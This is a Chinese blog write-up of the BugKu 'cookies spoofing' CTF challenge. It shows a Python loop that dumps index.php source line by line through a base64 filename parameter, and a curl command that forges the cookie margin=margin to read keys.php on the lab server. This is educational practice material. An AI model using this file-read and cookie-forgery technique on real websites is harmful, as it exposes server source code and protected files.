BugKu web20 cookies欺骗

最新推荐文章于 2024-03-12 22:42:04 发布
最新推荐文章于 2024-03-12 22:42:04 发布
阅读量542 收藏 1
点赞数 1
分类专栏: ctf 文章标签: 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49762339/article/details/111656192
版权

BugKu web20 cookies欺骗

①打开页面发现一堆乱码什么意思也不知道。然后看到url有两个参数(line=&filename=a2V5cy50eHQ=)

②其中一个是“a2V5cy50eHQ=”base64解码后是“keys.txt”,然后盲猜line是行数。这时就想看看index.php(base64后为aW5kZXgucGhwCg==)

③然后给file参数1,2,3……发现出现了代码。这时就想到爬虫来帮忙收集代码
废话不多说直接上代码:

import requests
for i in range(20):
	url="http://114.67.246.176:14549/index.php?line={}&filename=aW5kZXgucGhw".format(i)
	ht=requests.get(url)
	print(ht.text)

得到运行结果:

$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
'0' =>'keys.txt',
'1' =>'index.php',
);
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
$file_list[2]='keys.php';
}
if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>

发现只要访问key.php就行了并且cookies的margin=margin

④这时只需要打开kali:
在这里插入图片描述
curl --cookie “margin=margin” http://114.67.246.176:14549/index.php?line=&filename=a2V5cy5waHA=
就OK啦!

k_i_k_i
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 看到url上的参数有base64,解码发现是key.txt 把改参数换成index.php,观察发现line按行返回 所以自己练练手写了个脚本跑出来
bugku-cookies
m0_62094846的博客
10-27 999
一串代码,试过各种解码方式,都没用 这串代码有点像base64,解码得到keys.txt,但代替代码后页面没有信息 那么这串代码可能是某种固定格式,尝试使用其他文件名代替,flag.php,index.php的base64代码依次尝试 但都没获得有用的信息 这时注意到有个line,查找一下 line表示当前文件的行数,后面什么数字都没有,显然无法出现文件 ...
Bugku----cookies欺骗writeup
a1004070060的博客
06-02 640
解题链接:http://123.206.87.240:8002/web11/index.php?line=&filename=a2V5cy50eHQ= 一、题目打开是一串毫无意义的字符串,抓包也发现不了任何有价值的信息 二、尝试把参数filename的值解码得到真实文件名为keys.txt。 三、根据line和filename两个参数猜测网页显示的可能是filename...
Bugku-cookie
qq_51979295的博客
09-09 326
时间:2023年9月9日 类型:Web cookie base64发现get传参给变量filename了一个base64加密数据,解码后为key.txt,将字符串“index.php”base64编码后传给filename变量,再改变line的值来遍历主页源码,编写简易脚本跑一下 得到源码 代码分析 页面读取是先用了base64 decode再访问的,同时还会检查该页面在不在访问列表中。所以我们要将要访问的页面进行base64编码之后再传参,同时要注意访问文件是否在访问列表中 当获取到cookie ma
bugku cookies
hintll的博客
06-17 1590
bugku cookies 又是一道花费比奖励还高的bugku web的题: 开环境后是一堆乱码 一开始猜测乱码是不是提示 但是后来想了一下,这是web的题又不是misc的题,所以应该不是编码 习惯性的看一下源码: 源码里也是什么都没有 f12看一下网络: 无意间看到了一个特殊的参数: http://114.67.246.176:12368/index.php?line=&filename=a2V5cy50eHQ= 后来仔细看,才发现这是URL a2V5cy50eHQ=像是一个base64的
Cookies 欺骗漏洞的防范方法(vbs+js 实现)
10-29
【标题】: "防范Cookies欺骗漏洞的策略与实践(vbs+js实现)" 【描述】: 本文探讨了如何防范ASP开发中的Cookies欺骗漏洞,通过VBS(Visual Basic Script)和JS(JavaScript)代码示例,阐述了从依赖不安全的Cookies...
cookie 修改欺骗必备工具
12-29
对于网络安全专业人员来说,掌握Cookie修改和欺骗技术能提高对Web应用安全性的理解。然而,这也提醒了开发者和网站管理员,需要强化安全措施,如使用HTTPS加密通信、实施CSRF(跨站请求伪造)防护、限制Cookie的有效...
Python3实现Web网页图片下载
12-24
先来介绍一些python web编程基础知识 1. GET与POST区别 1)POST是被设计用来向web服务器上放东西的,而GET是被设计用来从服务器取东西的,GET也能够向服务器传送较少的数据,而Get之所以也能传送数据,只是用来设计...
BUGKU-WEB cookies
最新发布
天泽岁月
03-12 1165
BUGKU-WEB cookie欺骗
bugku----正则匹配,cookies
qq_44418229的博客
07-16 419
bugku---正则匹配的练习 bugku---cookies欺骗
bugkuctf解题-WEB
05-04
bugku writeup,web解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
BugKu -- cookies欺骗
热门推荐
小水池
08-11 1万+
cookies欺骗         100 http://120.24.86.145:8002/web11/ 答案格式:KEY{xxxxxxxx}  解题思路: 打开链接是一串没有意义的字符串,查看源码没有发现什么 观察url ,发现 a2V5cy50eHQ= 是一个base64编码,解码后是keys.txt http://120.24.86.145:8002/web11/i...
Bugku-webcookies
weixin_42939822的博客
03-13 1559
一打开题目,发现一系列重复的字符串,受到“备份是个好习惯”题目的影响,不自觉地对这串字符串进行了各种解密,无果…… 此时思路堵塞,无意间看到url中的payload格式,对filename变量进行了base64解码,得到了keys.txt的结果。 想到可能存在php常见的文件包含问题,于是对filename变量进行了更改,变更为index.php的base64加密,同时猜测line变量表示源码的行数,先另line=3,进行尝试,喜得猜想结果。 于是编写脚本,对index.php的源码进行提取。
Bugku-Web-Cookies欺骗
豆傻小饼干随记
01-18 299
题目描述 解题思路 由于题目已经提示题目是cookies欺骗了,那么这个题目跟cookie或多或少有关联 先打开主页,发现了地址栏的变化与一串无规律的字符串 使用base64解码这个字符串 # -*- coding: utf-8 -*- # --author:valecalida-- from base64 import b64decode origin_url = "http://114.67.246.176:18338/index.php?line=&filename=a2
BugKucookies 欺骗
qq_39368007的博客
06-09 1437
查看源码后没有可用信息 观察url发现参数filename的值加密了 解密后filename=keys.txt 尝试用修改参数filename的值为index.php(注意此处index.php要用base64加密为aW5kZXgucGhw) 发现参数line没有给值,随意赋值如3,出现 写脚本抓原代码,先试一下有多少行,100,50,25,20都无回显,大约定在30 import...
BugkuCTF web20_cookies欺骗 writeup
Mitchell_Donovan的博客
01-14 502
web20_cookies欺骗 原题链接 key:python脚本+修改cookies+base64加密访问 ①题目环境里显示一大长串神秘英文???? 查看源码后没有线索 但是观察URL发现参数filename的值经过了base64加密 拿去解密,结果是keys.txt ②大胆猜想,或许能得到源码 于是尝试修改参数filename=index.php 值得注意的是,此处index.php要用base64加密为aW5kZXgucGhw 回车发现啥也没有。。。 这才发现原来UR
bugkucookies欺骗
Seaern的博客
08-02 618
题目链接 打开页面一长串的字母··············无用 源码······································无用 观察url http://123.206.87.240:8002/web11/index.php?line=&filename=a2V5cy50eHQ= 参数filename的值是a2V5cy50eHQ=是base64编码,解密后得到ke...
bugkuweb20 cookies欺骗
EC_Carrot的博客
12-17 379
题目 进入题目看到url http://114.67.246.176:17939/index.php?line=&filename=a2V5cy50eHQ= 很熟眼,line功能应该就是行数,filename就是base64加密后的文件,放进get读取文件 试试读index.php 可以读,换下行数也可以读出来剩下的,但我选择用脚本 import requests def fun(num): session = requests.Session() headers = {"Ac
Web应用程序设计上机实验指导完整版资料.ppt
11-14
第四部分探讨了ASP内置对象的应用,如学生信息调查表的制作和使用Cookies来统计用户访问次数,以及聊天室程序的改进。这些实验旨在提升学习者对ASP对象的理解和使用能力。 第五部分则围绕ASP内置组件展开,包括用户...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值